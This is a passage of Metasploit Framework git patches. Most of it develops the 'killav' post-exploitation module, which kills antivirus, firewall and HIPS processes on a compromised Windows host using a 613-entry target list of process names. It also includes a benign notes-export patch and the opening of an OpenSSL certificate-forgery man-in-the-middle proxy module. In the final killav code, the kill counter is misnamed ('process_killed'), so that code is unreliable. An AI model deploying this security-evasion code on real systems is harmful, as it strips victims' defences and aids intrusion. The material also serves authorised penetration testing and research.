-  jedi.exe
-  kavlite40eng.exe
-  kavpers40eng.exe
-  kavpf.exe
-  kazza.exe
-  keenvalue.exe
-  kerio-pf-213-en-win.exe
-  kerio-wrl-421-en-win.exe
-  kerio-wrp-421-en-win.exe
-  kernel32.exe
-  killprocesssetup161.exe
-  launcher.exe
-  ldnetmon.exe
-  ldpro.exe
-  ldpromenu.exe
-  ldscan.exe
-  lnetinfo.exe
-  loader.exe
-  localnet.exe
-  lockdown.exe
-  lockdown2000.exe
-  lookout.exe
-  lordpe.exe
-  lsetup.exe
-  luall.exe
-  luau.exe
-  lucomserver.exe
-  luinit.exe
-  luspt.exe
-  mapisvc32.exe
-  mcagent.exe
-  mcmnhdlr.exe
-  mcshield.exe
-  mctool.exe
-  mcupdate.exe
-  mcvsrte.exe
-  mcvsshld.exe
-  md.exe
-  mfin32.exe
-  mfw2en.exe
-  mfweng3.02d30.exe
-  mgavrtcl.exe
-  mgavrte.exe
-  mghtml.exe
-  mgui.exe
-  minilog.exe
-  mmod.exe
-  monitor.exe
-  moolive.exe
-  mostat.exe
-  mpfagent.exe
-  mpfservice.exe
-  mpftray.exe
-  mrflux.exe
-  msapp.exe
-  msbb.exe
-  msblast.exe
-  mscache.exe
-  msccn32.exe
-  mscman.exe
-  msconfig.exe
-  msdm.exe
-  msdos.exe
-  msiexec16.exe
-  msinfo32.exe
-  mslaugh.exe
-  msmgt.exe
-  msmsgri32.exe
-  mssmmc32.exe
-  mssys.exe
-  msvxd.exe
-  mu0311ad.exe
-  mwatch.exe
-  n32scanw.exe
-  nav.exe
-  navap.navapsvc.exe
-  navapsvc.exe
-  navapw32.exe
-  navdx.exe
-  navlu32.exe
-  navnt.exe
-  navstub.exe
-  navw32.exe
-  navwnt.exe
-  nc2000.exe
-  ncinst4.exe
-  ndd32.exe
-  neomonitor.exe
-  neowatchlog.exe
-  netarmor.exe
-  netd32.exe
-  netinfo.exe
-  netmon.exe
-  netscanpro.exe
-  netspyhunter-1.2.exe
-  netstat.exe
-  netutils.exe
-  nisserv.exe
-  nisum.exe
-  nmain.exe
-  nod32.exe
-  normist.exe
-  norton_internet_secu_3.0_407.exe
-  notstart.exe
-  npf40_tw_98_nt_me_2k.exe
-  npfmessenger.exe
-  nprotect.exe
-  npscheck.exe
-  npssvc.exe
-  nsched32.exe
-  nssys32.exe
-  nstask32.exe
-  nsupdate.exe
-  nt.exe
-  ntrtscan.exe
-  ntvdm.exe
-  ntxconfig.exe
-  nui.exe
-  nupgrade.exe
-  nvarch16.exe
-  nvc95.exe
-  nvsvc32.exe
-  nwinst4.exe
-  nwservice.exe
-  nwtool16.exe
-  ollydbg.exe
-  onsrvr.exe
-  optimize.exe
-  ostronet.exe
-  otfix.exe
-  outpost.exe
-  outpostinstall.exe
-  outpostproinstall.exe
-  padmin.exe
-  panixk.exe
-  patch.exe
-  pavcl.exe
-  pavproxy.exe
-  pavsched.exe
-  pavw.exe
-  pccwin98.exe
-  pcfwallicon.exe
-  pcip10117_0.exe
-  pcscan.exe
-  pdsetup.exe
-  periscope.exe
-  persfw.exe
-  perswf.exe
-  pf2.exe
-  pfwadmin.exe
-  pgmonitr.exe
-  pingscan.exe
-  platin.exe
-  pop3trap.exe
-  poproxy.exe
-  popscan.exe
-  portdetective.exe
-  portmonitor.exe
-  powerscan.exe
-  ppinupdt.exe
-  pptbc.exe
-  ppvstop.exe
-  prizesurfer.exe
-  prmt.exe
-  prmvr.exe
-  procdump.exe
-  processmonitor.exe
-  procexplorerv1.0.exe
-  programauditor.exe
-  proport.exe
-  protectx.exe
-  pspf.exe
-  purge.exe
-  qconsole.exe
-  qserver.exe
-  rapapp.exe
-  rav7.exe
-  rav7win.exe
-  rav8win32eng.exe
-  ray.exe
-  rb32.exe
-  rcsync.exe
-  realmon.exe
-  reged.exe
-  regedit.exe
-  regedt32.exe
-  rescue.exe
-  rescue32.exe
-  rrguard.exe
-  rshell.exe
-  rtvscan.exe
-  rtvscn95.exe
-  rulaunch.exe
-  run32dll.exe
-  rundll.exe
-  rundll16.exe
-  ruxdll32.exe
-  safeweb.exe
-  sahagent.exescan32.exe
-  shstat.exe
-  tbmon.exe
-  vstskmgr.exe
-  engineserver.exe
-  mfevtps.exe
-  mfeann.exe
-  mcscript.exe
-  updaterui.exe
-  udaterui.exe
-  naprdmgr.exe
-  frameworkservice.exe
-  cleanup.exe
-  cmdagent.exe
-  frminst.exe
-  mcscript_inuse.exe
-  mctray.exe
-  mcshield.exe
-  save.exe
-  savenow.exe
-  sbserv.exe
-  sc.exe
-  scam32.exe
-  scan32.exe
-  scan95.exe
-  scanpm.exe
-  scrscan.exe
-  serv95.exe
-  setup_flowprotector_us.exe
-  setupvameeval.exe
-  sfc.exe
-  sgssfw32.exe
-  sh.exe
-  shellspyinstall.exe
-  shn.exe
-  showbehind.exe
-  smc.exe
-  sms.exe
-  smss32.exe
-  soap.exe
-  sofi.exe
-  sperm.exe
-  spf.exe
-  sphinx.exe
-  spoler.exe
-  spoolcv.exe
-  spoolsv32.exe
-  spyxx.exe
-  srexe.exe
-  srng.exe
-  ss3edit.exe
-  ssg_4104.exe
-  ssgrate.exe
-  st2.exe
-  start.exe
-  stcloader.exe
-  supftrl.exe
-  support.exe
-  supporter5.exe
-  svc.exe
-  svchostc.exe
-  svchosts.exe
-  svshost.exe
-  sweep95.exe
-  sweepnet.sweepsrv.sys.swnetsup.exe
-  symproxysvc.exe
-  symtray.exe
-  sysedit.exe
-  system.exe
-  system32.exe
-  sysupd.exe
-  taskmg.exe
-  taskmo.exe
-  taskmon.exe
-  taumon.exe
-  tbscan.exe
-  tc.exe
-  tca.exe
-  tcm.exe
-  tds-3.exe
-  tds2-98.exe
-  tds2-nt.exe
-  teekids.exe
-  tfak.exe
-  tfak5.exe
-  tgbob.exe
-  titanin.exe
-  titaninxp.exe
-  tracert.exe
-  trickler.exe
-  trjscan.exe
-  trjsetup.exe
-  trojantrap3.exe
-  tsadbot.exe
-  tvmd.exe
-  tvtmd.exe
-  undoboot.exe
-  updat.exe
-  update.exe
-  upgrad.exe
-  utpost.exe
-  vbcmserv.exe
-  vbcons.exe
-  vbust.exe
-  vbwin9x.exe
-  vbwinntw.exe
-  vcsetup.exe
-  vet32.exe
-  vet95.exe
-  vettray.exe
-  vfsetup.exe
-  vir-help.exe
-  virusmdpersonalfirewall.exe
-  vnlan300.exe
-  vnpc3000.exe
-  vpc32.exe
-  vpc42.exe
-  vpfw30s.exe
-  vptray.exe
-  vscan40.exe
-  vscenu6.02d30.exe
-  vsched.exe
-  vsecomr.exe
-  vshwin32.exe
-  vsisetup.exe
-  vsmain.exe
-  vsmon.exe
-  vsstat.exe
-  vswin9xe.exe
-  vswinntse.exe
-  vswinperse.exe
-  w32dsm89.exe
-  w9x.exe
-  watchdog.exe
-  webdav.exe
-  webscanx.exe
-  webtrap.exe
-  wfindv32.exe
-  whoswatchingme.exe
-  wimmun32.exe
-  win-bugsfix.exe
-  win32.exe
-  win32us.exe
-  winactive.exe
-  window.exe
-  windows.exe
-  wininetd.exe
-  wininitx.exe
-  winlogin.exe
-  winmain.exe
-  winnet.exe
-  winppr32.exe
-  winrecon.exe
-  winservn.exe
-  winssk32.exe
-  winstart.exe
-  winstart001.exe
-  wintsk32.exe
-  winupdate.exe
-  wkufind.exe
-  wnad.exe
-  wnt.exe
-  wradmin.exe
-  wrctrl.exe
-  wsbgate.exe
-  wupdater.exe
-  wupdt.exe
-  wyvernworksfirewall.exe
-  xpf202en.exe
-  zapro.exe
-  zapsetup3001.exe
-  zatutor.exe
-  zonalm2601.exe
-  zonealarm.exe
-}
+
+avs = ::File.read(::File.join(Msf::Config.data_directory, "/wordlists/av_list.txt"))
 
    client.sys.process.get_processes().each do |x|
      if (avs.index(x['name'].downcase))
@@ -652,5 +34,5 @@ avs = %W{
 end
 
 
-
+	
 end

From 579fb5fb1f731bc37c99929ede43a45a29dc099e Mon Sep 17 00:00:00 2001
From: Marc-Andre Meloche <marcandremeloche@gmail.com>
Date: Wed, 15 Jul 2015 20:09:42 -0400
Subject: [PATCH 0798/1013] Fixed

Fixed
---
 modules/post/windows/manage/killav.rb | 3 ---
 1 file changed, 3 deletions(-)

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index 96b6e894dc..19de668a0f 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -32,7 +32,4 @@ avs = ::File.read(::File.join(Msf::Config.data_directory, "/wordlists/av_list.tx
      end
    end
 end
-
-
-	
 end

From 8bead8fd874ba950c83066cbdc3ff9559aec466b Mon Sep 17 00:00:00 2001
From: Marc-Andre Meloche <marcandremeloche@gmail.com>
Date: Wed, 15 Jul 2015 20:26:42 -0400
Subject: [PATCH 0799/1013] av_list.txt

it's the av_list.txt, i sure hope this works.
---
 data/wordlists/av_list.txt | 613 +++++++++++++++++++++++++++++++++++++
 1 file changed, 613 insertions(+)
 create mode 100644 data/wordlists/av_list.txt

diff --git a/data/wordlists/av_list.txt b/data/wordlists/av_list.txt
new file mode 100644
index 0000000000..c396591cb2
--- /dev/null
+++ b/data/wordlists/av_list.txt
@@ -0,0 +1,613 @@
+emet_agent.exe
+emet_service.exe
+firesvc.exe
+firetray.exe
+hipsvc.exe
+mfevtps.exe
+mcafeefire.exe
+scan32.exe
+shstat.exe
+tbmon.exe
+vstskmgr.exe
+engineserver.exe
+mfevtps.exe
+mfeann.exe
+mcscript.exe
+updaterui.exe
+udaterui.exe
+naprdmgr.exe
+frameworkservice.exe
+cleanup.exe
+cmdagent.exe
+frminst.exe
+mcscript_inuse.exe
+mctray.exe
+mcshield.exe
+AAWTray.exe
+Ad-Aware.exe
+MSASCui.exe
+_avp32.exe
+_avpcc.exe
+_avpm.exe
+aAvgApi.exe
+ackwin32.exe
+adaware.exe
+advxdwin.exe
+agentsvr.exe
+agentw.exe
+alertsvc.exe
+alevir.exe
+alogserv.exe
+amon9x.exe
+anti-trojan.exe
+antivirus.exe
+ants.exe
+apimonitor.exe
+aplica32.exe
+apvxdwin.exe
+arr.exe
+atcon.exe
+atguard.exe
+atro55en.exe
+atupdater.exe
+atwatch.exe
+au.exe
+aupdate.exe
+auto-protect.nav80try.exe
+autodown.exe
+autotrace.exe
+autoupdate.exe
+avconsol.exe
+ave32.exe
+avgcc32.exe
+avgctrl.exe
+avgemc.exe
+avgnt.exe
+avgrsx.exe
+avgserv.exe
+avgserv9.exe
+avguard.exe
+avgw.exe
+avkpop.exe
+avkserv.exe
+avkservice.exe
+avkwctl9.exe
+avltmain.exe
+avnt.exe
+avp.exe
+avp.exe
+avp32.exe
+avpcc.exe
+avpdos32.exe
+avpm.exe
+avptc32.exe
+avpupd.exe
+avsched32.exe
+avsynmgr.exe
+avwin.exe
+avwin95.exe
+avwinnt.exe
+avwupd.exe
+avwupd32.exe
+avwupsrv.exe
+avxmonitor9x.exe
+avxmonitornt.exe
+avxquar.exe
+backweb.exe
+bargains.exe
+bd_professional.exe
+beagle.exe
+belt.exe
+bidef.exe
+bidserver.exe
+bipcp.exe
+bipcpevalsetup.exe
+bisp.exe
+blackd.exe
+blackice.exe
+blink.exe
+blss.exe
+bootconf.exe
+bootwarn.exe
+borg2.exe
+bpc.exe
+brasil.exe
+bs120.exe
+bundle.exe
+bvt.exe
+ccapp.exe
+ccevtmgr.exe
+ccpxysvc.exe
+cdp.exe
+cfd.exe
+cfgwiz.exe
+cfiadmin.exe
+cfiaudit.exe
+cfinet.exe
+cfinet32.exe
+claw95.exe
+claw95cf.exe
+clean.exe
+cleaner.exe
+cleaner3.exe
+cleanpc.exe
+click.exe
+cmesys.exe
+cmgrdian.exe
+cmon016.exe
+connectionmonitor.exe
+cpd.exe
+cpf9x206.exe
+cpfnt206.exe
+ctrl.exe
+cv.exe
+cwnb181.exe
+cwntdwmo.exe
+datemanager.exe
+dcomx.exe
+defalert.exe
+defscangui.exe
+defwatch.exe
+deputy.exe
+divx.exe
+dllcache.exe
+dllreg.exe
+doors.exe
+dpf.exe
+dpfsetup.exe
+dpps2.exe
+drwatson.exe
+drweb32.exe
+drwebupw.exe
+dssagent.exe
+dvp95.exe
+dvp95_0.exe
+ecengine.exe
+efpeadm.exe
+emsw.exe
+ent.exe
+esafe.exe
+escanhnt.exe
+escanv95.exe
+espwatch.exe
+ethereal.exe
+etrustcipe.exe
+evpn.exe
+exantivirus-cnet.exe
+exe.avxw.exe
+expert.exe
+explore.exe
+f-agnt95.exe
+f-prot.exe
+f-prot95.exe
+f-stopw.exe
+fameh32.exe
+fast.exe
+fch32.exe
+fih32.exe
+findviru.exe
+firewall.exe
+fnrb32.exe
+fp-win.exe
+fp-win_trial.exe
+fprot.exe
+frw.exe
+fsaa.exe
+fsav.exe
+fsav32.exe
+fsav530stbyb.exe
+fsav530wtbyb.exe
+fsav95.exe
+fsgk32.exe
+fsm32.exe
+fsma32.exe
+fsmb32.exe
+gator.exe
+gbmenu.exe
+gbpoll.exe
+generics.exe
+gmt.exe
+guard.exe
+guarddog.exe
+hacktracersetup.exe
+hbinst.exe
+hbsrv.exe
+hotactio.exe
+hotpatch.exe
+htlog.exe
+htpatch.exe
+hwpe.exe
+hxdl.exe
+hxiul.exe
+iamapp.exe
+iamserv.exe
+iamstats.exe
+ibmasn.exe
+ibmavsp.exe
+icload95.exe
+icloadnt.exe
+icmon.exe
+icsupp95.exe
+icsuppnt.exe
+idle.exe
+iedll.exe
+iedriver.exe
+iface.exe
+ifw2000.exe
+inetlnfo.exe
+infus.exe
+infwin.exe
+init.exe
+intdel.exe
+intren.exe
+iomon98.exe
+istsvc.exe
+jammer.exe
+jdbgmrg.exe
+jedi.exe
+kavlite40eng.exe
+kavpers40eng.exe
+kavpf.exe
+kazza.exe
+keenvalue.exe
+kerio-pf-213-en-win.exe
+kerio-wrl-421-en-win.exe
+kerio-wrp-421-en-win.exe
+kernel32.exe
+killprocesssetup161.exe
+launcher.exe
+ldnetmon.exe
+ldpro.exe
+ldpromenu.exe
+ldscan.exe
+lnetinfo.exe
+loader.exe
+localnet.exe
+lockdown.exe
+lockdown2000.exe
+lookout.exe
+lordpe.exe
+lsetup.exe
+luall.exe
+luau.exe
+lucomserver.exe
+luinit.exe
+luspt.exe
+mapisvc32.exe
+mcagent.exe
+mcmnhdlr.exe
+mcshield.exe
+mctool.exe
+mcupdate.exe
+mcvsrte.exe
+mcvsshld.exe
+md.exe
+mfin32.exe
+mfw2en.exe
+mfweng3.02d30.exe
+mgavrtcl.exe
+mgavrte.exe
+mghtml.exe
+mgui.exe
+minilog.exe
+mmod.exe
+monitor.exe
+moolive.exe
+mostat.exe
+mpfagent.exe
+mpfservice.exe
+mpftray.exe
+mrflux.exe
+msapp.exe
+msbb.exe
+msblast.exe
+mscache.exe
+msccn32.exe
+mscman.exe
+msconfig.exe
+msdm.exe
+msdos.exe
+msiexec16.exe
+msinfo32.exe
+mslaugh.exe
+msmgt.exe
+msmsgri32.exe
+mssmmc32.exe
+mssys.exe
+msvxd.exe
+mu0311ad.exe
+mwatch.exe
+n32scanw.exe
+nav.exe
+navap.navapsvc.exe
+navapsvc.exe
+navapw32.exe
+navdx.exe
+navlu32.exe
+navnt.exe
+navstub.exe
+navw32.exe
+navwnt.exe
+nc2000.exe
+ncinst4.exe
+ndd32.exe
+neomonitor.exe
+neowatchlog.exe
+netarmor.exe
+netd32.exe
+netinfo.exe
+netmon.exe
+netscanpro.exe
+netspyhunter-1.2.exe
+netstat.exe
+netutils.exe
+nisserv.exe
+nisum.exe
+nmain.exe
+nod32.exe
+normist.exe
+norton_internet_secu_3.0_407.exe
+notstart.exe
+npf40_tw_98_nt_me_2k.exe
+npfmessenger.exe
+nprotect.exe
+npscheck.exe
+npssvc.exe
+nsched32.exe
+nssys32.exe
+nstask32.exe
+nsupdate.exe
+nt.exe
+ntrtscan.exe
+ntvdm.exe
+ntxconfig.exe
+nui.exe
+nupgrade.exe
+nvarch16.exe
+nvc95.exe
+nvsvc32.exe
+nwinst4.exe
+nwservice.exe
+nwtool16.exe
+ollydbg.exe
+onsrvr.exe
+optimize.exe
+ostronet.exe
+otfix.exe
+outpost.exe
+outpostinstall.exe
+outpostproinstall.exe
+padmin.exe
+panixk.exe
+patch.exe
+pavcl.exe
+pavproxy.exe
+pavsched.exe
+pavw.exe
+pccwin98.exe
+pcfwallicon.exe
+pcip10117_0.exe
+pcscan.exe
+pdsetup.exe
+periscope.exe
+persfw.exe
+perswf.exe
+pf2.exe
+pfwadmin.exe
+pgmonitr.exe
+pingscan.exe
+platin.exe
+pop3trap.exe
+poproxy.exe
+popscan.exe
+portdetective.exe
+portmonitor.exe
+powerscan.exe
+ppinupdt.exe
+pptbc.exe
+ppvstop.exe
+prizesurfer.exe
+prmt.exe
+prmvr.exe
+procdump.exe
+processmonitor.exe
+procexplorerv1.0.exe
+programauditor.exe
+proport.exe
+protectx.exe
+pspf.exe
+purge.exe
+qconsole.exe
+qserver.exe
+rapapp.exe
+rav7.exe
+rav7win.exe
+rav8win32eng.exe
+ray.exe
+rb32.exe
+rcsync.exe
+realmon.exe
+reged.exe
+regedit.exe
+regedt32.exe
+rescue.exe
+rescue32.exe
+rrguard.exe
+rshell.exe
+rtvscan.exe
+rtvscn95.exe
+rulaunch.exe
+run32dll.exe
+rundll.exe
+rundll16.exe
+ruxdll32.exe
+safeweb.exe
+sahagent.exescan32.exe
+shstat.exe
+tbmon.exe
+vstskmgr.exe
+engineserver.exe
+mfevtps.exe
+mfeann.exe
+mcscript.exe
+updaterui.exe
+udaterui.exe
+naprdmgr.exe
+frameworkservice.exe
+cleanup.exe
+cmdagent.exe
+frminst.exe
+mcscript_inuse.exe
+mctray.exe
+mcshield.exe
+save.exe
+savenow.exe
+sbserv.exe
+sc.exe
+scam32.exe
+scan32.exe
+scan95.exe
+scanpm.exe
+scrscan.exe
+serv95.exe
+setup_flowprotector_us.exe
+setupvameeval.exe
+sfc.exe
+sgssfw32.exe
+sh.exe
+shellspyinstall.exe
+shn.exe
+showbehind.exe
+smc.exe
+sms.exe
+smss32.exe
+soap.exe
+sofi.exe
+sperm.exe
+spf.exe
+sphinx.exe
+spoler.exe
+spoolcv.exe
+spoolsv32.exe
+spyxx.exe
+srexe.exe
+srng.exe
+ss3edit.exe
+ssg_4104.exe
+ssgrate.exe
+st2.exe
+start.exe
+stcloader.exe
+supftrl.exe
+support.exe
+supporter5.exe
+svchostc.exe
+svchosts.exe
+sweep95.exe
+sweepnet.sweepsrv.sys.swnetsup.exe
+symproxysvc.exe
+symtray.exe
+sysedit.exe
+sysupd.exe
+taskmg.exe
+taskmo.exe
+taumon.exe
+tbscan.exe
+tc.exe
+tca.exe
+tcm.exe
+tds-3.exe
+tds2-98.exe
+tds2-nt.exe
+teekids.exe
+tfak.exe
+tfak5.exe
+tgbob.exe
+titanin.exe
+titaninxp.exe
+tracert.exe
+trickler.exe
+trjscan.exe
+trjsetup.exe
+trojantrap3.exe
+tsadbot.exe
+tvmd.exe
+tvtmd.exe
+undoboot.exe
+updat.exe
+update.exe
+upgrad.exe
+utpost.exe
+vbcmserv.exe
+vbcons.exe
+vbust.exe
+vbwin9x.exe
+vbwinntw.exe
+vcsetup.exe
+vet32.exe
+vet95.exe
+vettray.exe
+vfsetup.exe
+vir-help.exe
+virusmdpersonalfirewall.exe
+vnlan300.exe
+vnpc3000.exe
+vpc32.exe
+vpc42.exe
+vpfw30s.exe
+vptray.exe
+vscan40.exe
+vscenu6.02d30.exe
+vsched.exe
+vsecomr.exe
+vshwin32.exe
+vsisetup.exe
+vsmain.exe
+vsmon.exe
+vsstat.exe
+vswin9xe.exe
+vswinntse.exe
+vswinperse.exe
+w32dsm89.exe
+w9x.exe
+watchdog.exe
+webdav.exe
+webscanx.exe
+webtrap.exe
+wfindv32.exe
+whoswatchingme.exe
+wimmun32.exe
+win-bugsfix.exe
+win32.exe
+win32us.exe
+winactive.exe
+window.exe
+windows.exe
+wininetd.exe
+wininitx.exe
+winlogin.exe
+winmain.exe
+winnet.exe
+winppr32.exe
+winrecon.exe
+winservn.exe
+winssk32.exe
+winstart.exe
+winstart001.exe
+wintsk32.exe
+winupdate.exe
+wkufind.exe
+wnad.exe
+wnt.exe
+wradmin.exe
+wrctrl.exe
+wsbgate.exe
+wupdater.exe
+wupdt.exe
+wyvernworksfirewall.exe
+xpf202en.exe
+zapro.exe
+zapsetup3001.exe
+zatutor.exe
+zonalm2601.exe
+zonealarm.exe

From 2735c035b5577b0b00338603b2ef9b087123b045 Mon Sep 17 00:00:00 2001
From: Marc-Andre Meloche <marcandremeloche@gmail.com>
Date: Wed, 15 Jul 2015 20:36:19 -0400
Subject: [PATCH 0800/1013] fixed issues as requested.

fixed.
---
 modules/post/windows/manage/killav.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index 19de668a0f..34a11bc13f 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -23,10 +23,10 @@ class Metasploit3 < Msf::Post
 
   def run
 
-avs = ::File.read(::File.join(Msf::Config.data_directory, "/wordlists/av_list.txt"))
+  avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists', 'av_list.txt'))
 
    client.sys.process.get_processes().each do |x|
-     if (avs.index(x['name'].downcase))
+       if avs.include?(x['name'].downcase)
        print_status("Killing off #{x['name']}...")
        client.sys.process.kill(x['pid'])
      end

From 986463e489b4f65b664e36f3d2aecd3749fa357a Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 16 Jul 2015 11:35:01 +1000
Subject: [PATCH 0801/1013] Fix killav post module, handle errors, better
 output

---
 .../{av_list.txt => av_hips_executables.txt}  |  1 +
 modules/post/windows/manage/killav.rb         | 59 +++++++++++++------
 2 files changed, 42 insertions(+), 18 deletions(-)
 rename data/wordlists/{av_list.txt => av_hips_executables.txt} (99%)

diff --git a/data/wordlists/av_list.txt b/data/wordlists/av_hips_executables.txt
similarity index 99%
rename from data/wordlists/av_list.txt
rename to data/wordlists/av_hips_executables.txt
index c396591cb2..ad26923f55 100644
--- a/data/wordlists/av_list.txt
+++ b/data/wordlists/av_hips_executables.txt
@@ -118,6 +118,7 @@ bvt.exe
 ccapp.exe
 ccevtmgr.exe
 ccpxysvc.exe
+ccsvchst.exe
 cdp.exe
 cfd.exe
 cfgwiz.exe
diff --git a/modules/post/windows/manage/killav.rb b/modules/post/windows/manage/killav.rb
index 34a11bc13f..c470c62117 100644
--- a/modules/post/windows/manage/killav.rb
+++ b/modules/post/windows/manage/killav.rb
@@ -2,34 +2,57 @@
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-##
 
 require 'msf/core'
+require 'set'
 
-class Metasploit3 < Msf::Post
+class Metasploit4 < Msf::Post
 
   def initialize(info={})
     super(update_info(info,
-        'Name'          => 'Windows Post Kill Antivirus and Hips',
-        'Description'   => %q{
-          Converted and merged several post scripts to remove a maximum of av and hips.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Marc-Andre Meloche (MadmanTM)', 'Nikhil Mittal (Samratashok)', 'Jerome Athias'],
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
+      'Name'         => 'Windows Post Kill Antivirus and Hips',
+      'Description'  => %q{
+        This module attempts to locate and terminate any processes that are identified
+        as being Antivirus or Host-based IPS related.
+      },
+      'License'      => MSF_LICENSE,
+      'Author'       => [
+        'Marc-Andre Meloche (MadmanTM)',
+        'Nikhil Mittal (Samratashok)',
+        'Jerome Athias'
+      ],
+      'Platform'     => ['win'],
+      'SessionTypes' => ['meterpreter']
     ))
   end
 
   def run
+    avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists',
+                                  'av_hips_executables.txt')).strip
+    avs = Set.new(avs.split("\n"))
 
-  avs = ::File.read(::File.join(Msf::Config.data_directory, 'wordlists', 'av_list.txt'))
+    processes_found = 0
+    processes_killed = 0
+    client.sys.process.get_processes().each do |x|
+      vprint_status("Checking #{x['name'].downcase} ...")
+      if avs.include?(x['name'].downcase)
+        processes_found += 1
+        print_status("Attempting to terminate '#{x['name']}' (PID: #{x['pid']}) ...")
+        begin
+          client.sys.process.kill(x['pid'])
+          process_killed += 1
+          print_good("#{x['name']} terminated.")
+        rescue Rex::Post::Meterpreter::RequestError
+          print_error("Failed to terminate '#{x['name']}' (PID: #{x['pid']}).")
+        end
+      end
+    end
+
+    if processes_found == 0
+      print_status('No target processes were found.')
+    else
+      print_good("A total of #{processes_found} process(es) were discovered, #{processes_killed} were terminated.")
+    end
+  end
 
-   client.sys.process.get_processes().each do |x|
-       if avs.include?(x['name'].downcase)
-       print_status("Killing off #{x['name']}...")
-       client.sys.process.kill(x['pid'])
-     end
-   end
-end
 end

From 73fd4bd853dc58fba811dbb3779c84b2ecf26e9d Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 16 Jul 2015 00:28:15 -0500
Subject: [PATCH 0802/1013] Allow the notes command to save notes as a file

The -o option can save notes as a file.
---
 lib/msf/ui/console/command_dispatcher/db.rb | 45 ++++++++++++++++++++-
 1 file changed, 44 insertions(+), 1 deletion(-)

diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index 02f6356cf0..cb372a609d 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -1176,6 +1176,7 @@ class Db
     print_line "  -h,--help                 Show this help information"
     print_line "  -R,--rhosts               Set RHOSTS from the results of the search"
     print_line "  -S,--search               Regular expression to match for search"
+    print_line "  -o,--output               Save the notes to a csv file"
     print_line "  --sort <field1,field2>    Fields to sort by (case sensitive)"
     print_line
     print_line "Examples:"
@@ -1196,6 +1197,7 @@ class Db
     host_ranges = []
     rhosts      = []
     search_term = nil
+    out_file    = nil
 
     while (arg = args.shift)
       case arg
@@ -1222,6 +1224,8 @@ class Db
         search_term = /#{args.shift}/nmi
       when '--sort'
         sort_term = args.shift
+      when '-o', '--output'
+        out_file = args.shift
       when '-h','--help'
         cmd_notes_help
         return
@@ -1231,7 +1235,6 @@ class Db
           return
         end
       end
-
     end
 
     if mode == :add
@@ -1308,12 +1311,21 @@ class Db
     end
 
     # Now display them
+    csv_table = Rex::Ui::Text::Table.new(
+      'Header'  => 'Notes',
+      'Indent'  => 1,
+      'Columns' => ['Time', 'Host', 'Service', 'Port', 'Protocol', 'Type', 'Data']
+    )
+
     note_list.each do |note|
       next if(types and types.index(note.ntype).nil?)
+      csv_note = []
       msg = "Time: #{note.created_at} Note:"
+      csv_note << note.created_at if out_file
       if (note.host)
         host = note.host
         msg << " host=#{note.host.address}"
+        csv_note << note.host.address if out_file
         if set_rhosts
           addr = (host.scope ? host.address + '%' + host.scope : host.address )
           rhosts << addr
@@ -1321,17 +1333,37 @@ class Db
       end
       if (note.service)
         msg << " service=#{note.service.name}" if note.service.name
+        csv_note << note.service.name || '' if out_file
         msg << " port=#{note.service.port}" if note.service.port
+        csv_note << note.service.port || '' if out_file
         msg << " protocol=#{note.service.proto}" if note.service.proto
+        csv_note << note.service.proto || '' if out_file
+      else
+        if out_file
+          csv_note << '' # For the Service field
+          csv_note << '' # For the Port field
+          csv_note << '' # For the Protocol field
+        end
       end
       msg << " type=#{note.ntype} data=#{note.data.inspect}"
+      if out_file
+        csv_note << note.ntype
+        csv_note << note.data.inspect
+      end
       print_status(msg)
+      if out_file
+        csv_table << csv_note
+      end
       if mode == :delete
         note.destroy
         delete_count += 1
       end
     end
 
+    if out_file
+      save_csv_notes(out_file, csv_table)
+    end
+
     # Finally, handle the case where the user wants the resulting list
     # of hosts to go into RHOSTS.
     set_rhosts_from_addrs(rhosts.uniq) if set_rhosts
@@ -1340,6 +1372,17 @@ class Db
   }
   end
 
+  def save_csv_notes(fpath, csv_table)
+    begin
+      File.open(fpath, 'wb') do |f|
+        f.write(csv_table.to_csv)
+      end
+      print_status("Notes saved as #{fpath}")
+    rescue Errno::EACCES => e
+      print_error("Unable to save notes. #{e.message}")
+    end
+  end
+
   def make_sortable(input)
     case input
     when String

From 5d6c15a43dde66f14480532c35bc9a2e0eb6a9ea Mon Sep 17 00:00:00 2001
From: Ramon de C Valle <rcvalle@rcvalle.com>
Date: Wed, 15 Jul 2015 22:36:29 -0700
Subject: [PATCH 0803/1013] Add openssl_altchainsforgery_mitm_proxy.rb

This module exploits a logic error in OpenSSL by impersonating the
server and sending a specially-crafted chain of certificates, resulting
in certain checks on untrusted certificates to be bypassed on the
client, allowing it to use a valid leaf certificate as a CA certificate
to sign a fake certificate. The SSL/TLS session is then proxied to the
server allowing the session to continue normally and application data
transmitted between the peers to be saved. This module requires an
active man-in-the-middle attack.
---
 .../openssl_altchainsforgery_mitm_proxy.rb    | 203 ++++++++++++++++++
 1 file changed, 203 insertions(+)
 create mode 100644 modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb

diff --git a/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
new file mode 100644
index 0000000000..e8143e1413
--- /dev/null
+++ b/modules/auxiliary/server/openssl_altchainsforgery_mitm_proxy.rb
@@ -0,0 +1,203 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'openssl'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+
+  def initialize
+    super(
